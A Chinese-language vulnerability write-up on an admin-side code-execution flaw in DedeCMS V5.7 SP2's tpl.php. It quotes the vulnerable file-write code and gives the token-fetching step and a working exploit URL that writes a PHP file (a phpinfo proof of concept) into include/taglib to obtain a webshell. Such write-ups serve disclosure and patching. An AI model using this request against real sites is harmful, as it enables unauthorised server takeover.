跳转至

DedeCMS V5.7 SP2后台存在代码执行漏洞

影响版本

DedeCMS V5.7 SP2

漏洞简介

织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。

漏洞详情

默认后台地址 /dede/,文件 dede/tpl.php 中的251到281行。

csrf_check();
    #filename和前面正则的匹配情况
    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
    {
        ShowMsg('文件名不合法,不允许进行操作!', '-1');
        exit();
    }
    require_once(DEDEINC.'/oxwindow.class.php');
    #搜索filename中匹配`\.lib\.php$#i`的部分,以空格代替
    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);
    #去掉反斜号
    $content = stripslashes($content);
    #拼接文件名
    $truefile = DEDEINC.'/taglib/'.$filename;
    #写入内容
    $fp = fopen($truefile, 'w');
    fwrite($fp, $content);
    fclose($fp);

replace处理之后赋值给变量 \(tagname 。但是写入文件的时候并没有用到\)tagname 。 那为什么有这个$tagname,拼接文件名的时候,应该是拼接tagname

利用

1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。

3.这里还有一个csrf_check()函数,即请求中必须要带token参数。

漏洞利用

  1. 首先获取token。访问域名 + /dede/tpl.php?action=upload

    http://127.0.0.1/uploads/dede/tpl.php?action=upload

    通过查看页面源码即可获得 token

token

2.然后访问

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=你的token值

shell 地址

http://127.0.0.1/include/taglib/secnote.lib.php

1

参考来源

DedeCMS V5.7 SP2后台存在代码执行漏洞:http://www.freebuf.com/vuls/164035.html

Dede CMS 下载中心:http://www.dedecms.com/products/dedecms/downloads/